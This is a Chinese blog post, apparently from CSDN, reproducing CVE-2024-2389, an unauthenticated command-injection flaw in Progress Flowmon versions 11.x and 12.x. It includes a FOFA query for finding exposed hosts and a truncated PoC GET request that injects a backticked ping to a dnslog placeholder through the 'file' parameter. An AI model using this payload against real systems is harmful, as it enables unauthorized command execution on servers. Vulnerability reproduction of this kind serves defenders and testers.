Progress Flowmon 未授权RCE漏洞复现(CVE-2024-2389)

0x01 产品简介

Progress在2021年9月收购Kemp Technologies提高了其监控能力,在其解决方案的保护伞下增加了新兴的网络性能监控供应商Flowmon。Flowmon 为安全运营能力提供异常检测、容量攻击检测、数据存储和流量分析。提供实时NetFlow和IPFIX监控,并分析来自物理,虚拟或云基础架构的网络流量数据。它还收集由路由器,交换机或独立硬件探测器生成的流数据统计信息。用户可以添加自定义过滤器,根据用户想要查看的数据设置数据收集参数。

0x02 漏洞概述

未经身份验证的远程攻击者可以访问 Flowmon 的 Web 界面,以发出精心设计的 API 命令,该命令将允许在未经身份验证的情况下执行任意系统命令,获取服务器权限。

0x03 影响范围

产品: Flowmon
版本:11.x、12.x
平台:全部

11.0之前的所有Flowmon版本(10.x 及更低版本)均不受此漏洞影响。

0x04 复现环境

FOFA:body="Flowmon-Web-Interface"

0x05 漏洞复现

PoC

GET /service.pdfs/confluence?lang=en&file=`ping+xxxx.dnslog.cn` HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Wi
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值